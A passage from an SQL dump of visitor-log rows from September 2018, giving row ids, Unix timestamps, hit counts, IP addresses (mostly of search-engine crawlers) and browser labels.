,1,0,0,'54.36.149.58','other'),(299624,1536315592,1,1,0,0,'66.249.66.25','chrome'),(299625,1536315687,1,1,0,0,'54.36.148.98','other'),(299626,1536315708,2,2,0,0,'66.249.66.74','chrome'),(299627,1536315807,1,1,0,0,'54.36.148.243','other'),(299628,1536316180,1,1,0,0,'54.36.149.54','other'),(299629,1536316185,1,1,0,0,'54.36.148.174','other'),(299630,1536316562,2,2,0,0,'66.249.66.73','chrome'),(299631,1536316566,1,1,0,0,'54.36.148.108','other'),(299632,1536316668,1,1,0,0,'46.211.154.18','chrome'),(299633,1536316723,1,1,0,0,'54.36.148.67','other'),(299634,1536316847,1,1,0,0,'54.36.149.4','other'),(299635,1536316870,1,1,0,0,'54.36.148.193','other'),(299636,1536316954,2,2,0,0,'54.36.148.184','other'),(299637,1536316967,1,1,0,0,'54.36.148.132','other'),(299638,1536317051,1,1,0,0,'66.249.66.75','chrome'),(299639,1536317056,1,1,0,0,'66.249.66.74','chrome'),(299640,1536317077,1,1,0,0,'37.115.189.131','firefox'),(299641,1536317431,1,1,0,0,'8.29.198.27','other'),(299642,1536317635,4,4,0,0,'178.154.244.29','other'),(299643,1536317638,1,1,0,0,'5.45.207.79','other'),(299644,1536317720,1,1,0,0,'178.154.244.11','other'),(299645,1536317736,1,1,0,0,'54.36.148.201','other'),(299646,1536317859,1,1,0,0,'207.46.13.127','other'),(299647,1536318064,2,1,1,0,'66.249.66.74',''),(299648,1536318117,1,1,0,0,'54.36.148.229','other'),(299649,1536318216,1,1,0,0,'54.36.148.122','other'),(299650,1536318299,2,2,0,0,'66.249.66.75','chrome'),(299651,1536318321,1,1,0,0,'66.249.66.74','chrome'),(299652,1536318350,1,1,0,0,'66.249.66.73','chrome'),(299653,1536318549,1,1,0,0,'54.36.149.39','other'),(299654,1536318569,1,1,0,0,'54.36.148.24','other'),(299655,1536318625,1,1,0,0,'91.196.178.89','chrome'),(299656,1536318805,1,1,0,0,'54.36.148.183','other'),(299657,1536318836,1,1,0,0,'54.36.148.182','other'),(299658,1536318889,15,15,0,0,'188.40.102.170','other'),(299659,1536318891,1,1,0,0,'91.196.178.184','chrome'),(299660,1536318950,1,1,0,0,'54.36.148.189','other'),(299661,1536318992,1,1,0,0,'54.165.59.7','other'),(299662,1536319018,1,1,0,0,'54.36.148.227','other'),(299663,1536319104,1,1,0,0,'54.36.149.94','other'),(299664,1536319166,1,1,0,0,'5.9.155.226','other'),(299665,1536319251,1,1,0,0,'54.36.148.66','other'),(299666,1536319284,2,1,1,0,'66.249.66.73',''),(299667,1536319552,1,1,0,0,'54.36.148.31','other'),(299668,1536319631,1,1,0,0,'66.249.66.74','chrome'),(299669,1536319803,3,3,0,0,'188.40.102.170','other'),(299670,1536320223,1,1,0,0,'91.196.178.89','chrome'),(299671,1536320300,1,1,0,0,'54.36.148.12','other'),(299672,1536320506,1,1,0,0,'54.36.148.40','other'),(299673,1536320510,1,1,0,0,'178.154.244.11','other'),(299674,1536320535,2,2,0,0,'66.249.66.74','chrome'),(299675,1536320590,3,3,0,0,'66.249.66.73','chrome'),(299676,1536320634,1,1,0,0,'178.154.244.29','other'),(299677,1536320651,1,1,0,0,'66.249.66.75','chrome'),(299678,1536321252,1,1,0,0,'91.196.178.89','chrome'),(299679,1536321264,1,1,0,0,'54.36.148.173','other'),(299680,1536321454,1,1,0,0,'54.36.149.92','other'),(299681,1536321545,1,1,0,0,'54.36.149.62','other'),(299682,1536321776,1,1,0,0,'66.249.66.75','chrome'),(299683,1536321892,1,1,0,0,'54.36.149.24','other'),(299684,1536322038,1,1,0,0,'178.154.244.29','other'),(299685,1536322249,1,1,0,0,'54.36.148.82','other'),(299686,1536322941,1,1,0,0,'54.36.149.45','other'),(299687,1536323226,2,1,1,0,'66.249.66.74',''),(299688,1536323228,2,2,0,0,'54.165.59.7','other'),(299689,1536323399,1,1,0,0,'54.36.148.69','other'),(299690,1536323424,1,1,0,0,'54.36.148.123','other'),(299691,1536323618,1,1,0,0,'54.36.148.154','other'),(299692,1536323733,1,1,0,0,'185.191.204.6','chrome'),(299693,1536323933,1,1,0,0,'66.249.66.75','chrome'),(299694,1536323950,1,1,0,0,'178.154.244.29','other'),(299695,1536323966,1,1,0,0,'54.36.149.21','other'),(299696,1536323967,1,1,0,0,'46.211.44.82','chrome'),(299697,1536324035,1,1,0,0,'54.36.148.157','other'),(299698,1536324444,2,2,0,0,'54.165.59.7','other'),(299699,1536324471,1,1,0,0,'54.36.149.29','other'),(299700,1536324508,1,0,1,0,'66.249.66.74',''),(299701,1536324510,2,2,0,0,'66.249.66.74','chrome'),(299702,1536324639,1,1,0,0,'54.36.148.136','other'),(299703,1536324781,2,1,1,0,'66.249.66.73',''),(299704,1536324838,1,1,0,0,'54.36.148.233','other'),(299705,1536325390,1,1,0,0,'54.165.59.7','other'),(299706,1536325456,1,1,0,0,'54.36.148.94','other'),(299707,1536325484,1,0,1,0,'66.249.66.75',''),(299708,1536325589,2,2,0,0,'66.249.66.75','chrome'),(299709,1536325688,1,1,0,0,'66.249.66.73','chrome'),(299710,1536325763,1,1,0,0,'54.36.148.244','other'),(299711,1536325821,1,1,0,0,'54.36.149.62','other'),(299712,1536325844,7,7,0,0,'157.55.39.237','other'),(299713,1536326475,12,12,0,0,'207.46.13.127','other'),(299714,1536326487,6,6,0,0,'207.46.13.208','other'),(299715,1536326493,1,1,0,0,'66.249.66.75','chrome'),(299716,1536326497,7,7,0,0,'207.46.13.64','other'),(299717,1536326622,1,1,0,0,'54.36.149.10','other'),(299718,1536326683,1,1,0,0,'178.154.244.11','other'),(299719,1536326794,1,1,0,0,'54.36.148.134','other'),(299720,1536327051,1,1,0,0,'54.36.148.192','other'),(299721,1536327055,2,1,1,0,'66.249.66.74',''),(299722,1536327424,1,1,0,0,'54.36.149.11','other'),(299723,1536327550,1,1,0,0,'54.36.148.11','other'),(299724,1536327675,1,1,0,0,'54.36.149.97','other'),(299725,1536327699,1,1,0,0,'66.249.66.73','chrome'),(299726,1536327740,1,1,0,0,'54.36.148.228','other'),(299727,1536328072,3,3,0,0,'66.249.66.75','chrome'),(299728,1536328256,1,1,0,0,'8.29.198.27','other'),(299729,1536328536,1,1,0,0,'66.249.66.25','chrome'),(299730,1536328641,1,1,0,0,'54.36.148.132','other'),(299731,1536328656,1,1,0,0,'54.36.149.54','other'),(299732,1536328703,1,1,0,0,'66.249.66.27','chrome'),(299733,1536328933,1,1,0,0,'54.36.149.100','other'),(299734,1536328975,2,2,0,0,'66.249.66.74','chrome'),(299735,1536328999,2,2,0,0,'178.154.244.29','other'),(299736,1536329107,1,1,0,0,'54.36.148.241','other'),(299737,1536329481,1,1,0,0,'207.46.13.64','other'),(299738,1536329623,1,1,0,0,'54.36.148.254','other'),(299739,1536329860,1,1,0,0,'54.36.148.244','other'),(299740,1536329949,1,1,0,0,'54.36.148.38','other'),(299741,1536330126,3,3,0,0,'66.249.66.73','chrome'),(299742,1536330156,1,1,0,0,'54.36.148.104','other'),(299743,1536330326,1,1,0,0,'54.36.149.85','other'),(299744,1536330805,2,2,0,0,'66.249.66.74','chrome'),(299745,1536330813,1,1,0,0,'54.36.148.102','other'),(299746,1536330924,1,1,0,0,'207.46.13.64','other'),(299747,1536330957,1,1,0,0,'54.36.149.80','other'),(299748,1536331043,1,1,0,0,'54.36.149.97','other'),(299749,1536331265,2,2,0,0,'66.249.66.73','chrome'),(299750,1536331408,1,1,0,0,'54.36.148.159','other'),(299751,1536331623,1,1,0,0,'54.36.148.151','other'),(299752,1536331814,1,1,0,0,'54.36.149.50','other'),(299753,1536331953,1,0,1,0,'66.249.66.75',''),(299754,1536331976,1,1,0,0,'54.36.148.186','other'),(299755,1536332093,1,1,0,0,'54.36.149.49','other'),(299756,1536332136,1,1,0,0,'5.45.207.19','other'),(299757,1536332146,1,1,0,0,'54.36.149.26','other'),(299758,1536332386,1,0,1,0,'66.249.66.73',''),(299759,1536332734,2,1,1,0,'66.249.66.73',''),(299760,1536332793,1,1,0,0,'54.36.148.90','other'),(299761,1536332968,1,1,0,0,'54.36.149.59','other'),(299762,1536333060,1,1,0,0,'54.36.148.199','other'),(299763,1536333413,1,1,0,0,'54.36.148.23','other'),(299764,1536333703,1,1,0,0,'178.154.244.11','other'),(299765,1536334061,1,1,0,0,'54.36.148.233','other'),(299766,1536334296,3,3,0,0,'66.249.66.75','chrome'),(299767,1536334465,1,1,0,0,'54.36.148.83','other'),(299768,1536334507,1,1,0,0,'54.36.149.72','other'),(299769,1536334535,1,1,0,0,'66.249.66.25','chrome'),(299770,1536334576,1,1,0,0,'40.77.167.32','other'),(299771,1536334693,1,1,0,0,'91.196.178.72','firefox'),(299772,1536334974,1,1,0,0,'54.36.149.57','other'),(299773,1536335017,1,1,0,0,'54.165.59.7','other'),(299774,1536335113,1,1,0,0,'54.36.148.104','other'),(299775,1536335376,1,1,0,0,'95.216.20.84','other'),(299776,1536335458,1,0,1,0,'66.249.66.75',''),(299777,1536335574,1,1,0,0,'188.230.43.254','other'),(299778,1536335655,1,1,0,0,'54.36.148.153','other'),(299779,1536335763,5,5,0,0,'66.249.66.75','chrome'),(299780,1536335880,1,1,0,0,'54.36.149.34','other'),(299781,1536335925,1,1,0,0,'207.46.13.208','other'),(299782,1536336029,1,1,0,0,'54.36.149.26','other'),(299783,1536336052,1,1,0,0,'54.36.148.101','other'),(299784,1536336327,1,1,0,0,'66.249.66.74','chrome'),(299785,1536336519,1,1,0,0,'54.36.148.106','other'),(299786,1536336788,1,1,0,0,'66.249.66.75','chrome'),(299787,1536336804,7,7,0,0,'213.32.243.107','other'),(299788,1536337026,2,1,1,0,'66.249.66.73',''),(299789,1536337096,1,1,0,0,'54.36.149.79','other'),(299790,1536337314,1,1,0,0,'54.36.149.38','other'),(299791,1536337691,1,1,0,0,'54.36.148.57','other'),(299792,1536337882,2,1,1,0,'66.249.66.73',''),(299793,1536337905,1,1,0,0,'54.36.148.109','other'),(299794,1536337910,1,1,0,0,'66.249.66.74','chrome'),(299795,1536337940,1,1,0,0,'54.36.148.91','other'),(299796,1536337976,1,1,0,0,'188.230.43.254','other'),(299797,1536338131,1,1,0,0,'54.36.148.77','other'),(299798,1536338149,1,1,0,0,'54.36.148.61','other'),(299799,1536338190,1,1,0,0,'66.249.66.27','chrome'),(299800,1536338316,1,1,0,0,'5.45.207.19','other'),(299801,1536338354,1,1,0,0,'54.36.148.163','other'),(299802,1536338574,1,1,0,0,'46.133.137.3','chrome'),(299803,1536338649,1,1,0,0,'54.36.149.99','other'),(299804,1536338668,1,1,0,0,'54.36.148.184','other'),(299805,1536338704,1,1,0,0,'93.170.35.47','chrome'),(299806,1536338714,1,1,0,0,'54.36.148.240','other'),(299807,1536338793,1,1,0,0,'66.249.66.73','chrome'),(299808,1536338907,2,2,0,0,'66.249.66.74','chrome'),(299809,1536339096,1,1,0,0,'8.29.198.27','other'),(299810,1536339468,1,1,0,0,'178.154.200.48','other'),(299811,1536339963,1,1,0,0,'54.36.149.84','other'),(299812,1536339987,1,1,0,0,'178.154.171.27','other'),(299813,1536340076,1,1,0,0,'95.163.255.103','other'),(299814,1536340081,1,1,0,0,'95.163.255.108','other'),(299815,1536340085,2,2,0,0,'95.163.255.107','other'),(299816,1536340087,1,1,0,0,'54.36.148.30','other'),(299817,1536340143,1,1,0,0,'54.36.149.6','other'),(299818,1536340374,1,1,0,0,'188.230.43.254','other'),(299819,1536340535,1,1,0,0,'54.36.148.241','other'),(299820,1536340564,1,1,0,0,'66.249.66.74','chrome'),(299821,1536340739,1,1,0,0,'54.36.149.94','other'),(299822,1536340801,1,1,0,0,'54.36.148.184','other'),(299823,1536340841,1,1,0,0,'54.36.149.14','other'),(299824,1536340922,2,1,1,0,'66.249.66.73',''),(299825,1536340971,1,1,0,0,'54.36.149.2','other'),(299826,1536341129,1,1,0,0,'54.36.148.195','other'),(299827,1536341435,2,2,0,0,'54.36.149.57','other'),(299828,1536341597,1,1,0,0,'54.36.149.38','other'),(299829,1536341611,1,1,0,0,'54.36.149.33','other'),(299830,1536341662,1,1,0,0,'54.36.149.27','other'),(299831,1536341760,1,1,0,0,'87.250.224.65','other'),(299832,1536341847,1,1,0,0,'207.46.13.64','other'),(299833,1536341866,1,1,0,0,'54.36.149.77','other'),(299834,1536342311,2,2,0,0,'66.249.66.75','chrome'),(299835,1536342493,1,0,1,0,'66.249.66.74',''),(299836,1536342520,3,3,0,0,'66.249.66.73','chrome'),(299837,1536342535,1,1,0,0,'54.36.148.214','other'),(299838,1536342698,1,1,0,0,'54.36.148.177','other'),(299839,1536342746,1,1,0,0,'54.36.149.79','other'),(299840,1536342843,2,2,0,0,'54.36.148.117','other'),(299841,1536343157,1,1,0,0,'54.36.148.28','other'),(299842,1536343193,1,1,0,0,'54.36.148.23','other'),(299843,1536343218,1,1,0,0,'46.229.168.68','other'),(299844,1536343243,1,1,0,0,'66.249.66.25','chrome'),(299845,1536343410,3,2,1,0,'66.249.66.74',''),(299846,1536343466,1,1,0,0,'54.36.149.70','other'),(299847,1536343675,1,1,0,0,'40.77.167.32','other'),(299848,1536343754,1,1,0,0,'178.154.244.29','other'),(299849,1536343864,1,1,0,0,'54.36.148.187','other'),(299850,1536343985,1,1,0,0,'54.36.148.240','other'),(299851,1536344067,1,1,0,0,'54.36.148.21','other'),(299852,1536344299,1,1,0,0,'66.249.66.75','chrome'),(299853,1536344306,1,1,0,0,'66.249.66.74','chrome'),(299854,1536344601,1,1,0,0,'54.36.148.98','other'),(299855,1536345148,1,1,0,0,'54.36.148.215','other'),(299856,1536345336,1,1,0,0,'54.36.148.26','other'),(299857,1536345430,2,2,0,0,'66.249.66.75','chrome'),(299858,1536345471,1,1,0,0,'54.36.148.219','other'),(299859,1536345545,1,1,0,0,'13.66.139.0','other'),(299860,1536345573,2,2,0,0,'66.249.66.73','chrome'),(299861,1536345599,1,1,0,0,'130.180.210.14','chrome'),(299862,1536345904,1,1,0,0,'54.36.148.170','other'),(299863,1536345909,1,1,0,0,'54.36.148.246','other'),(299864,1536346094,1,1,0,0,'54.36.148.136','other'),(299865,1536346141,1,1,0,0,'54.36.148.191','other'),(299866,1536346255,1,1,0,0,'54.36.149.72','other'),(299867,1536346484,1,1,0,0,'54.36.149.68','other'),(299868,1536346577,1,1,0,0,'91.196.178.46','chrome'),(299869,1536346983,2,1,1,0,'66.249.66.73',''),(299870,1536346998,1,0,1,0,'66.249.66.74',''),(299871,1536347295,1,1,0,0,'66.249.66.73','chrome'),(299872,1536347466,2,2,0,0,'66.249.66.74','chrome'),(299873,1536347850,1,1,0,0,'207.46.13.208','other'),(299874,1536347980,1,1,0,0,'40.77.167.190','other'),(299875,1536348086,1,0,1,0,'66.249.66.75',''),(299876,1536348209,2,0,2,0,'66.249.66.73',''),(299877,1536348421,4,4,0,0,'66.249.66.75','chrome'),(299878,1536348441,2,2,0,0,'66.249.66.74','chrome'),(299879,1536348483,1,1,0,0,'54.36.148.12','other'),(299880,1536348604,4,4,0,0,'173.208.200.154','other'),(299881,1536349174,1,1,0,0,'54.36.149.26','other'),(299882,1536349181,1,1,0,0,'54.36.149.77','other'),(299883,1536349191,1,1,0,0,'54.36.148.203','other'),(299884,1536349215,1,1,0,0,'54.36.148.123','other'),(299885,1536349244,1,1,0,0,'54.36.148.72','other'),(299886,1536349377,1,1,0,0,'54.36.148.127','other'),(299887,1536349422,1,1,0,0,'54.36.149.104','other'),(299888,1536349541,1,1,0,0,'66.249.66.75','chrome'),(299889,1536349545,1,1,0,0,'54.36.149.22','other'),(299890,1536349666,1,1,0,0,'54.36.148.125','other'),(299891,1536349679,1,1,0,0,'54.36.149.42','other'),(299892,1536349934,1,1,0,0,'8.29.198.25','other'),(299893,1536350034,1,1,0,0,'54.36.148.31','other'),(299894,1536350453,1,1,0,0,'54.36.148.115','other'),(299895,1536350507,1,1,0,0,'54.36.148.52','other'),(299896,1536350508,2,2,0,0,'66.249.66.73','chrome'),(299897,1536350826,2,1,1,0,'66.249.66.75',''),(299898,1536351021,1,1,0,0,'54.36.149.102','other'),(299899,1536351310,1,0,1,0,'66.249.66.74',''),(299900,1536351331,1,1,0,0,'54.36.149.11','other'),(299901,1536351530,1,1,0,0,'54.36.149.76','other'),(299902,1536351546,2,2,0,0,'66.249.66.74','chrome'),(299903,1536351748,1,1,0,0,'66.249.66.73','chrome'),(299904,1536351769,1,1,0,0,'66.249.66.76','chrome'),(299905,1536351817,1,1,0,0,'54.36.149.47','other'),(299906,1536351871,1,1,0,0,'54.36.148.88','other'),(299907,1536352040,1,0,1,0,'66.249.66.75',''),(299908,1536352219,1,1,0,0,'66.249.66.25','chrome'),(299909,1536352546,1,1,0,0,'54.36.149.46','other'),(299910,1536352667,1,1,0,0,'54.36.149.14','other'),(299911,1536352719,1,1,0,0,'54.36.148.211','other'),(299912,1536352735,1,1,0,0,'54.36.148.108','other'),(299913,1536352957,1,1,0,0,'66.249.66.73','chrome'),(299914,1536353178,1,1,0,0,'54.208.102.37','other'),(299915,1536353180,1,1,0,0,'107.21.1.8','other'),(299916,1536353408,1,1,0,0,'54.36.149.7','other'),(299917,1536353542,1,1,0,0,'185.191.204.6','chrome'),(299918,1536353596,2,2,0,0,'66.249.66.75','chrome'),(299919,1536353618,1,1,0,0,'178.154.244.29','other'),(299920,1536353736,1,1,0,0,'54.36.149.1','other'),(299921,1536353824,1,1,0,0,'66.249.66.27','chrome'),(299922,1536354059,1,1,0,0,'54.36.149.24','other'),(299923,1536354264,1,1,0,0,'54.36.148.223','other'),(299924,1536354415,1,1,0,0,'207.46.13.208','other'),(299925,1536354416,1,1,0,0,'54.36.149.12','other'),(299926,1536354620,1,1,0,0,'54.36.149.81','other'),(299927,1536354660,1,0,1,0,'66.249.66.73',''),(299928,1536354738,1,1,0,0,'54.36.149.104','other'),(299929,1536354742,1,1,0,0,'54.36.149.19','other'),(299930,1536354745,1,1,0,0,'54.36.148.58','other'),(299931,1536354903,1,1,0,0,'54.36.148.12','other'),(299932,1536355049,3,3,0,0,'178.154.244.29','other'),(299933,1536355161,1,0,1,0,'66.249.66.75',''),(299934,1536355510,1,1,0,0,'54.36.149.46','other'),(299935,1536355598,1,1,0,0,'66.249.66.75','chrome'),(299936,1536355700,1,1,0,0,'54.36.149.40','other'),(299937,1536355891,2,2,0,0,'66.249.66.73','chrome'),(299938,1536355921,1,1,0,0,'54.36.148.71','other'),(299939,1536356297,1,1,0,0,'54.36.149.38','other'),(299940,1536356301,1,1,0,0,'54.36.148.132','other'),(299941,1536356304,1,1,0,0,'54.36.148.231','other'),(299942,1536357018,1,1,0,0,'54.36.148.31','other'),(299943,1536357275,2,2,0,0,'66.249.66.75','chrome'),(299944,1536357402,1,1,0,0,'66.249.66.73','chrome'),(299945,1536357488,1,1,0,0,'54.36.148.122','other'),(299946,1536357489,1,1,0,0,'54.36.148.226','other'),(299947,1536357825,1,1,0,0,'104.203.86.114','chrome'),(299948,1536358594,1,1,0,0,'54.36.148.15','other'),(299949,1536358735,1,0,1,0,'66.249.66.74',''),(299950,1536358738,1,1,0,0,'54.36.148.38','other'),(299951,1536358871,1,1,0,0,'54.36.148.198','other'),(299952,1536359135,1,1,0,0,'54.36.149.63','other'),(299953,1536359387,1,1,0,0,'163.172.4.153','other'),(299954,1536359525,1,1,0,0,'66.249.66.26','chrome'),(299955,1536359883,1,1,0,0,'54.36.148.181','other'),(299956,1536359909,1,1,0,0,'66.249.66.74','chrome'),(299957,1536359939,1,1,0,0,'54.36.148.121','other'),(299958,1536360093,1,0,1,0,'66.249.66.73',''),(299959,1536360279,1,0,1,0,'66.249.66.75',''),(299960,1536360450,1,1,0,0,'54.36.148.69','other'),(299961,1536360704,1,1,0,0,'54.36.148.131','other'),(299962,1536360765,1,1,0,0,'8.29.198.25','other'),(299963,1536360843,1,1,0,0,'178.154.171.24','other'),(299964,1536360858,1,1,0,0,'178.154.244.29','other'),(299965,1536361066,1,1,0,0,'40.77.167.190','other'),(299966,1536361494,1,1,0,0,'66.249.66.74','chrome'),(299967,1536361890,2,2,0,0,'66.249.66.73','chrome'),(299968,1536362259,1,1,0,0,'54.36.148.111','other'),(299969,1536362380,1,1,0,0,'54.36.149.93','other'),(299970,1536362508,1,1,0,0,'54.36.148.43','other'),(299971,1536362710,1,1,0,0,'54.36.148.177','other'),(299972,1536363321,1,1,0,0,'54.36.148.223','other'),(299973,1536363751,1,1,0,0,'54.36.148.24','other'),(299974,1536363789,1,1,0,0,'178.154.244.11','other'),(299975,1536363854,1,1,0,0,'54.36.148.53','other'),(299976,1536364044,2,2,0,0,'216.244.66.241','other'),(299977,1536364051,1,1,0,0,'54.36.148.189','other'),(299978,1536364105,1,1,0,0,'66.249.66.74','chrome'),(299979,1536364271,1,1,0,0,'54.36.148.255','other'),(299980,1536364453,1,1,0,0,'54.36.148.201','other'),(299981,1536364484,1,1,0,0,'54.36.148.74','other'),(299982,1536365132,1,1,0,0,'66.249.66.74','chrome'),(299983,1536365449,1,1,0,0,'54.36.148.28','other'),(299984,1536365769,1,1,0,0,'54.36.149.67','other'),(299985,1536365834,1,1,0,0,'54.36.148.225','other'),(299986,1536365835,1,1,0,0,'54.36.148.148','other'),(299987,1536366215,1,1,0,0,'54.36.149.61','other'),(299988,1536366219,2,2,0,0,'178.154.244.11','other'),(299989,1536366232,1,1,0,0,'5.45.207.79','other'),(299990,1536366239,1,1,0,0,'178.154.244.29','other'),(299991,1536366669,1,1,0,0,'54.36.148.255','other'),(299992,1536366686,1,1,0,0,'216.244.66.241','other'),(299993,1536366756,1,1,0,0,'128.68.35.142','chrome'),(299994,1536366828,1,1,0,0,'54.36.149.106','other'),(299995,1536366999,1,1,0,0,'54.36.148.205','other'),(299996,1536367133,1,1,0,0,'54.36.148.196','other'),(299997,1536367558,1,1,0,0,'54.36.148.83','other'),(299998,1536367665,1,1,0,0,'5.45.207.79','other'),(299999,1536367673,1,1,0,0,'54.36.148.197','other'),(300000,1536367714,1,0,1,0,'66.249.66.75',''),(300001,1536367753,1,1,0,0,'54.36.148.102','other'),(300002,1536367935,1,1,0,0,'54.36.148.82','other'),(300003,1536368380,3,3,0,0,'66.249.66.75','chrome'),(300004,1536368805,1,1,0,0,'54.36.149.76','other'),(300005,1536368851,1,1,0,0,'54.36.148.46','other'),(300006,1536369247,1,1,0,0,'54.36.148.243','other'),(300007,1536369313,1,1,0,0,'54.36.149.51','other'),(300008,1536369881,1,1,0,0,'178.154.244.29','other'),(300009,1536369946,1,1,0,0,'54.36.148.124','other'),(300010,1536369978,1,1,0,0,'54.36.149.69','other'),(300011,1536369981,1,1,0,0,'54.36.148.246','other'),(300012,1536370070,1,1,0,0,'54.36.149.49','other'),(300013,1536370073,1,1,0,0,'54.36.148.156','other'),(300014,1536370936,1,1,0,0,'54.36.148.227','other'),(300015,1536371117,2,2,0,0,'178.154.244.11','other'),(300016,1536371536,2,2,0,0,'54.36.148.253','other'),(300017,1536371556,1,1,0,0,'54.36.149.103','other'),(300018,1536371596,1,1,0,0,'8.29.198.27','other'),(300019,1536372127,1,1,0,0,'35.162.70.167','chrome'),(300020,1536372571,2,2,0,0,'178.154.244.11','other'),(300021,1536373442,1,0,1,0,'66.249.66.73',''),(300022,1536373744,1,1,0,0,'54.36.148.173','other'),(300023,1536373777,1,1,0,0,'54.36.149.7','other'),(300024,1536373797,1,1,0,0,'54.36.148.249','other'),(300025,1536374206,1,1,0,0,'54.36.148.174','other'),(300026,1536374508,1,1,0,0,'54.36.148.113','other'),(300027,1536374780,1,1,0,0,'91.196.178.74','chrome'),(300028,1536375090,1,1,0,0,'54.36.148.121','other'),(300029,1536375143,1,1,0,0,'54.36.148.73','other'),(300030,1536375599,1,1,0,0,'89.40.193.228','chrome'),(300031,1536375658,1,1,0,0,'54.36.148.81','other'),(300032,1536375865,1,0,1,0,'66.249.66.74',''),(300033,1536375883,1,1,0,0,'54.36.148.16','other'),(300034,1536376056,1,1,0,0,'54.36.149.98','other'),(300035,1536376134,1,1,0,0,'54.36.148.188','other'),(300036,1536376444,1,1,0,0,'54.36.148.31','other'),(300037,1536376464,1,1,0,0,'54.36.148.179','other'),(300038,1536376645,1,1,0,0,'54.36.148.191','other'),(300039,1536377053,1,1,0,0,'66.249.66.73','chrome'),(300040,1536377311,1,1,0,0,'54.36.148.112','other'),(300041,1536377334,1,1,0,0,'54.36.148.71','other'),(300042,1536377520,1,1,0,0,'54.36.148.90','other'),(300043,1536377595,1,1,0,0,'54.36.148.59','other'),(300044,1536377604,1,1,0,0,'54.36.148.52','other'),(300045,1536377754,1,1,0,0,'54.36.148.144','other'),(300046,1536377957,2,2,0,0,'178.63.26.114','other'),(300047,1536378554,1,0,1,0,'66.249.66.75',''),(300048,1536379003,1,1,0,0,'40.77.167.190','other'),(300049,1536379210,2,2,0,0,'178.154.244.29','other'),(300050,1536379327,1,1,0,0,'54.36.149.67','other'),(300051,1536379515,1,1,0,0,'66.249.66.73','chrome'),(300052,1536379567,2,2,0,0,'66.249.66.74','chrome'),(300053,1536379720,1,1,0,0,'54.36.149.71','other'),(300054,1536379817,1,1,0,0,'66.249.66.27','chrome'),(300055,1536379858,1,1,0,0,'54.36.148.139','other'),(300056,1536379931,1,1,0,0,'178.154.244.11','other'),(300057,1536380293,1,1,0,0,'54.36.148.89','other'),(300058,1536380541,1,1,0,0,'54.36.148.188','other'),(300059,1536380801,1,1,0,0,'54.36.148.17','other'),(300060,1536380981,1,1,0,0,'54.36.148.40','other'),(300061,1536381533,1,1,0,0,'54.36.149.72','other'),(300062,1536381581,1,1,0,0,'54.36.148.186','other'),(300063,1536381644,2,2,0,0,'178.154.244.11','other'),(300064,1536382344,1,1,0,0,'207.46.13.208','other'),(300065,1536382383,1,1,0,0,'54.36.148.91','other'),(300066,1536382419,1,1,0,0,'159.224.4.152','firefox'),(300067,1536382424,1,1,0,0,'8.29.198.25','other'),(300068,1536383203,1,1,0,0,'54.36.148.181','other'),(300069,1536383205,1,1,0,0,'54.36.148.29','other'),(300070,1536383311,1,1,0,0,'54.36.148.233','other'),(300071,1536383313,1,1,0,0,'54.36.149.56','other'),(300072,1536383369,1,1,0,0,'66.249.66.74','chrome'),(300073,1536383511,1,1,0,0,'54.36.149.102','other'),(300074,1536383647,1,1,0,0,'54.36.149.22','other'),(300075,1536383883,1,0,1,0,'66.249.66.75',''),(300076,1536384177,1,1,0,0,'54.36.148.25','other'),(300077,1536384487,2,2,0,0,'216.244.66.241','other'),(300078,1536384507,1,1,0,0,'54.36.148.101','other'),(300079,1536384575,1,1,0,0,'54.36.148.205','other'),(300080,1536384638,1,1,0,0,'54.36.149.45','other'),(300081,1536384755,1,1,0,0,'54.36.148.236','other'),(300082,1536384782,1,1,0,0,'54.36.148.195','other'),(300083,1536384890,3,3,0,0,'66.249.66.75','chrome'),(300084,1536384960,1,1,0,0,'54.36.148.151','other'),(300085,1536385017,1,1,0,0,'54.36.148.171','other'),(300086,1536385235,1,1,0,0,'54.36.149.50','other'),(300087,1536385255,1,1,0,0,'54.36.149.104','other'),(300088,1536385282,1,1,0,0,'54.36.149.39','other'),(300089,1536385307,1,1,0,0,'54.36.148.206','other'),(300090,1536385350,1,1,0,0,'66.249.66.25','chrome'),(300091,1536385667,1,1,0,0,'54.36.149.103','other'),(300092,1536385734,1,1,0,0,'54.36.148.128','other'),(300093,1536385784,1,1,0,0,'207.46.13.208','other'),(300094,1536385886,1,1,0,0,'178.154.244.29','other'),(300095,1536385897,1,1,0,0,'54.36.149.38','other'),(300096,1536385946,1,1,0,0,'54.36.149.67','other'),(300097,1536386332,1,1,0,0,'54.36.149.45','other'),(300098,1536386701,1,0,1,0,'66.249.66.26',''),(300099,1536387172,1,1,0,0,'54.36.148.149','other'),(300100,1536387259,1,1,0,0,'54.36.148.172','other'),(300101,1536387275,1,1,0,0,'40.77.167.214','other'),(300102,1536387383,1,1,0,0,'54.36.149.24','other'),(300103,1536387597,1,0,1,0,'66.249.66.73',''),(300104,1536387638,1,1,0,0,'54.36.148.122','other'),(300105,1536387693,1,1,0,0,'54.36.148.108','other'),(300106,1536387870,1,1,0,0,'54.36.148.37','other'),(300107,1536387935,1,1,0,0,'54.36.148.106','other'),(300108,1536387968,1,1,0,0,'54.36.148.100','other'),(300109,1536388103,1,1,0,0,'54.36.149.63','other'),(300110,1536388222,1,1,0,0,'54.36.149.8','other'),(300112,1536388499,1,1,0,0,'66.249.66.74','chrome'),(300113,1536388501,1,1,0,0,'54.36.148.22','other'),(300114,1536388948,1,1,0,0,'54.36.148.14','other'),(300115,1536389105,1,1,0,0,'54.36.148.36','other'),(300116,1536389415,1,1,0,0,'91.196.178.65','chrome'),(300117,1536389725,1,1,0,0,'54.36.148.139','other'),(300118,1536389738,1,1,0,0,'180.76.15.154','other'),(300119,1536389927,1,1,0,0,'54.36.148.193','other'),(300120,1536389960,1,0,1,0,'66.249.66.73',''),(300121,1536390003,1,1,0,0,'54.36.148.170','other'),(300122,1536390038,1,1,0,0,'54.36.148.134','other'),(300123,1536390042,1,1,0,0,'54.36.148.71','other'),(300124,1536390413,1,1,0,0,'54.36.148.248','other'),(300125,1536390491,2,2,0,0,'66.249.66.74','chrome'),(300126,1536390642,1,1,0,0,'66.249.66.27','chrome'),(300127,1536390925,1,1,0,0,'66.249.66.73','chrome'),(300128,1536391041,3,3,0,0,'178.154.244.29','other'),(300129,1536391294,1,1,0,0,'54.36.148.131','other'),(300130,1536391430,1,1,0,0,'54.36.149.45','other'),(300131,1536391571,1,1,0,0,'54.36.148.178','other'),(300132,1536391585,1,1,0,0,'54.36.149.61','other'),(300133,1536391627,1,1,0,0,'54.36.148.189','other'),(300134,1536391921,1,1,0,0,'54.36.148.212','other'),(300135,1536392199,1,1,0,0,'54.36.149.8','other'),